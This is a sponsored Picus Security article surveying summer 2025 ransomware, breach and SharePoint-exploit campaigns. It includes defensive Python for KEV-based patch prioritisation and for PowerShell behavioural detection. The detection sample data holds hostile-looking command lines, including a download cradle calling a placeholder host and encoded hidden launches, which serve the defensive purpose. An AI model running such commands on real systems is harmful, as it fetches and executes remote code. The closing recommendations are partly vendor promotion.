
Cyber Attacks Spiked in Summer 2025

Summer 2025 wasn't just hot; it was relentless.

Ransomware hammered hospitals, retail giants suffered data breaches, insurance firms were hit by phishing, and nation-state actors launched disruptive campaigns.

From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers kept defenders on their heels.

This report breaks down the season's most high-impact incidents and what security teams must do before the next wave hits.

Summer Exposes Healthcare's Rising Ransomware Risk

Hospitals cannot afford downtime, and attackers know it.

This summer, ransomware groups targeted healthcare, exploiting both the value of patient data and the urgency of care.

Interlock rises as a major threat to US healthcare

A July 22, 2025, joint advisory by CISA, FBI, and HHS highlighted Interlock as a major threat to the Healthcare and Public Health (HPH) sector. The group is linked to around 14 incidents in 2025 alone, a third of them affecting healthcare providers.

What sets Interlock apart is its use of "FileFix," a PowerShell launcher that hides malicious scripts behind decoy file paths. It tricks users into running payloads via File Explorer, bypassing typical security detections.

Rhysida ransomware targeted another US healthcare center

On July 8, 2025, the Rhysida ransomware group allegedly leaked sensitive data from Florida Hand Center, including medical images, driver's licenses, and insurance forms.

The clinic, which serves patients in Punta Gorda, Port Charlotte, and Fort Myers, was given just seven days to respond before the release.

Rhysida data leak site

Qilin recycles Scattered Spider playbook in wave of healthcare breaches

In June 2025, Qilin became the most active ransomware group, recording 81 victims, 52 of them in the healthcare sector.

The group exploited unpatched Fortinet vulnerabilities (CVE-2024-21762 and CVE-2024-55591) to gain access, deploy ransomware, and exfiltrate sensitive data such as EHRs and insurance records.

To maximize pressure, Qilin went beyond encryption, leveraging legal-themed extortion tactics like a "Call Lawyer" feature and automated negotiation tools to drive faster payouts.

Major Brands Breached in Retail Cybercrime Wave

The retail sector could not escape the wave of cyberattacks sweeping through Summer 2025.

Louis Vuitton breach marks third in a quarter

On July 2, 2025, Louis Vuitton UK suffered a data breach exposing customer contact details and purchase history, the third LVMH brand breach in three months after Dior and LV Korea.

Days later, on July 10, UK police arrested four suspects tied to high-profile attacks on M&S, Co-op, and Harrods.

The group is allegedly linked to Scattered Spider, a domestic threat actor known for social engineering and collaboration with ransomware operators like DragonForce, signaling the growing impact of homegrown cybercriminals on major retailers.

DragonForce hits US retail chain Belk

Between May 7 and 11, 2025, on the other side of the Atlantic, North Carolina-based retailer Belk suffered a data breach.

DragonForce claimed responsibility, stating it exfiltrated 156 GB of customer and employee data, including names, Social Security numbers, emails, order histories, and HR records, which were later posted on its leak site after ransom negotiations stalled.

DragonForce, first emerging in late 2023, operates as a ransomware-as-a-service cartel, listing roughly 136 victims by March 2025, many of them US and UK retail organizations.

Scattered Spider's tactics have shifted from retail to insurance

Scattered Spider (UNC3944), a native English-speaking cybercriminal collective, used identity-centric social engineering, voice phishing, MFA fatigue, help-desk impersonation, and typosquatted domains to breach UK retailers (M&S, Co-op, Harrods) in April–May 2025.

In mid-June 2025, researchers flagged that Scattered Spider (UNC3944) had shifted from retail to targeting US insurance firms.

  • Aflac detected and contained unauthorized access on June 12, 2025; customer and employee personal data (including SSNs and health claims) may have been compromised.

  • Erie Insurance and Philadelphia Insurance Companies also reported similar cyber disruptions in early to mid-June, resulting in operational downtime.


The intrusions matched Scattered Spider's known tactical profile, though no ransomware was deployed, and systems remained operational.

State-Sponsored and Geopolitical Cyber Activity

Not all cyber threats this summer were about money.

Nation-state hackers and hacktivists also made their mark, using the turbulent geopolitical climate to launch attacks.

  • June 14–17, 2025: Pro-Israel hacktivist group Predatory Sparrow hit Iran's Bank Sepah, disrupting banking services, then destroyed ~$90M in crypto by breaching Nobitex and sending tokens to burn wallets.

  • June 30, 2025: The US Department of Homeland Security and CISA issued a joint alert warning of impending Iranian cyber retaliation targeting critical infrastructure in the US and Europe.

These incidents serve as a stark reminder that cyber conflict is now a frontline extension of geopolitical tension, one that can ripple far beyond borders and sectors.

Key Vulnerabilities Gaining Public Attention

Several Microsoft SharePoint vulnerabilities were exploited this summer in a widespread cyber espionage campaign known as ToolShell.

  • CVE-2025-53770 is a critical remote code execution flaw allowing unauthenticated attackers to run arbitrary code on vulnerable on-prem SharePoint servers. Threat actors used it to deploy web shells, steal credentials, and move laterally through enterprise networks. CISA added the bug to its KEV catalog on July 20, 2025.

  • CVE-2025-49704 and CVE-2025-49706 were also added to the KEV on July 22 after being abused in chained attacks. The pair enables authentication bypass and code injection, allowing attackers to exploit unpatched SharePoint systems even when earlier fixes were applied.

The ToolShell campaign targeted organizations across the US, Europe, and the Middle East, including government agencies, energy firms, and telecom providers.

Security researchers say the attackers likely reverse-engineered Microsoft's July Patch Tuesday fixes to develop the bypass used in CVE-2025-53770.

What to Take from the Summer Wildfires in Cybersecurity?

From hospitals to retail giants and insurance providers to nation-states, the season exposed cracks in even the most fortified environments.


Here is what security teams should do next.

Patch like your life depends on it, because in critical sectors, lives do.

Start with CISA KEV entries and high-severity CVEs, but don't stop there. Ask the harder question: are you the kind of target that attackers go after?

Validate whether each CVE is actually exploitable in your environment.

Focus on exploit chains, not just the scores. That is what adversaries are doing.
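One way to turn the three points above into a triage rule, as an added example that is not Picus code or part of the original report: match a KEV-style feed against an asset inventory, then raise the priority of hosts that are internet-exposed, carry a CVE with known ransomware use, or leave every member of a chain unpatched. The KEV field names follow CISA's public JSON feed, but the Fortinet dates and ransomware flags, the chain definition, the inventory and the weights are all constructed for illustration.

```python
from collections import defaultdict

# Constructed KEV excerpt using the CVEs named in this report. Field names follow the
# CISA KEV JSON feed; the Fortinet dates and ransomware flags are placeholders that
# only mirror the report's narrative (Qilin used those bugs for ransomware).
KEV_EXCERPT = [
    {"cveID": "CVE-2025-53770", "product": "SharePoint", "dateAdded": "2025-07-20", "ransomware": "Unknown"},
    {"cveID": "CVE-2025-49704", "product": "SharePoint", "dateAdded": "2025-07-22", "ransomware": "Unknown"},
    {"cveID": "CVE-2025-49706", "product": "SharePoint", "dateAdded": "2025-07-22", "ransomware": "Unknown"},
    {"cveID": "CVE-2024-21762", "product": "FortiOS", "dateAdded": "PLACEHOLDER", "ransomware": "Known"},
    {"cveID": "CVE-2024-55591", "product": "FortiOS", "dateAdded": "PLACEHOLDER", "ransomware": "Known"},
]
# Chain from this report: the three SharePoint bugs were abused together in ToolShell.
CHAINS = {"ToolShell": {"CVE-2025-53770", "CVE-2025-49704", "CVE-2025-49706"}}

# Constructed inventory: product, CVEs already patched, and whether the host is reachable from the internet.
ASSETS = [
    {"host": "sp-legacy-01", "product": "SharePoint", "patched": set(), "exposed": True},
    {"host": "sp-intranet-02", "product": "SharePoint", "patched": {"CVE-2025-49704", "CVE-2025-49706"}, "exposed": False},
    {"host": "fw-edge-01", "product": "FortiOS", "patched": {"CVE-2024-21762"}, "exposed": True},
    {"host": "build-07", "product": "Jenkins", "patched": set(), "exposed": False},
]

def prioritize(assets, kev, chains):
    """Rank assets by urgency: open KEV CVEs, ransomware use, exposure and complete chains."""
    by_product = defaultdict(list)
    for entry in kev:
        by_product[entry["product"]].append(entry)
    ranked = []
    for asset in assets:
        entries = by_product[asset["product"]]
        open_cves = {e["cveID"] for e in entries} - asset["patched"]
        if not open_cves:            # nothing in the feed applies, or everything is patched
            continue
        score, reasons = 10 * len(open_cves), []
        if any(e["ransomware"] == "Known" for e in entries if e["cveID"] in open_cves):
            score += 20; reasons.append("ransomware-used")
        if asset["exposed"]:         # unauthenticated RCE on an exposed host is the worst case
            score += 30; reasons.append("internet-exposed")
        for name, members in chains.items():
            if members <= open_cves:  # every link of the chain is still open on this host
                score += 40; reasons.append(f"full-chain:{name}")
        ranked.append({"host": asset["host"], "open": sorted(open_cves), "score": score, "reasons": reasons})
    return sorted(ranked, key=lambda r: r["score"], reverse=True)
```

Note that sp-intranet-02 still surfaces: it applied the earlier SharePoint fixes but, exactly as the report describes, remains open to CVE-2025-53770.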

Harden identity as your new perimeter.

Social engineering worked better than malware this summer. Stop MFA fatigue attacks, reinforce help-desk verification, and limit privileged access.

Train your people, because they were the breach point.

Scattered Spider and others didn't exploit a CVE; they exploited a person. Run regular simulations, update phishing scenarios, and prepare high-risk roles for real-world lures.

Watch for what happens after initial access.

Threat actors like Interlock and Qilin didn't just drop ransomware; they moved laterally, staged data, and evaded detection. Implement behavioral monitoring for techniques such as PowerShell abuse, credential theft, and stealthy exfiltration.
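As an added example of the behavioral monitoring called for above (not Picus code and not from the report), the rules below score constructed PowerShell process-creation events for the post-access behaviors this season's incidents shared: encoded or hidden launches, download cradles, PowerShell spawned from a web-server worker (the follow-on to a web shell such as those dropped in ToolShell), a concealed launch from File Explorer, and bulk archive staging ahead of exfiltration. The event fields, weights and threshold are assumptions, not a vendor scheme.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style; not real telemetry.
EVENTS = [
    {"id": 1, "parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc PLACEHOLDERBASE64"},
    {"id": 2, "parent": "cmd.exe",
     "cmdline": "powershell -NoP -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"id": 3, "parent": "explorer.exe",
     "cmdline": "powershell.exe Get-Service -Name Spooler"},
    {"id": 4, "parent": "w3wp.exe",
     "cmdline": "powershell.exe -c Compress-Archive -Path C:\\Users -DestinationPath C:\\Windows\\Temp\\out.zip"},
]

# (name, weight, predicate over the lower-cased command line c and parent image p).
# Weights are this example's own choice; tune them against your own baseline.
RULES = [
    ("encoded_command", 40, lambda c, p: re.search(r"-(e|ec|enc|encodedcommand)\b", c)),
    ("hidden_window", 20, lambda c, p: re.search(r"-w(indowstyle)?\s+hidden", c)),
    ("policy_bypass", 20, lambda c, p: re.search(r"-e(p|xecutionpolicy)?\s+bypass", c)),
    ("download_cradle", 50, lambda c, p: re.search(r"\b(iex|invoke-expression)\b", c)
        and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", c)),
    # IIS worker process spawning PowerShell: typical follow-on after a web shell lands
    ("web_server_parent", 50, lambda c, p: p == "w3wp.exe"),
    # Launched from File Explorer yet hiding its window: user-tricked execution
    ("explorer_hidden", 20, lambda c, p: p == "explorer.exe" and "hidden" in c),
    # Bulk archiving of user data: staging step before exfiltration
    ("archive_staging", 20, lambda c, p: "compress-archive" in c),
]

def score_event(ev):
    """Return (score, matched rule names) for one event."""
    cmd, parent = ev["cmdline"].lower(), ev["parent"].lower()
    hits = [(name, w) for name, w, pred in RULES if pred(cmd, parent)]
    return sum(w for _, w in hits), [name for name, _ in hits]

def detect(events, threshold=50):
    """Return ids of events whose combined score reaches the alert threshold."""
    return [ev["id"] for ev in events if score_event(ev)[0] >= threshold]
```

Event 3 (an administrator checking a service from Explorer) scores zero, which is the point of combining weighted signals rather than alerting on the parent process alone.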

Don't ignore legacy systems and overlooked infrastructure.

The ToolShell campaign exploited unpatched on-prem SharePoint servers, many running unsupported or outdated versions.

Whether it's aging on-prem SharePoint, appliances, or unmonitored legacy gear, isolate what you can't upgrade, monitor what you can't patch, and replace what you've ignored.

We strongly recommend simulating the attacks described above to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform.

You can also test your defenses against hundreds of other malware and exploitation campaigns, such as Medusa, Rhysida, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.

Sponsored and written by Picus Security.
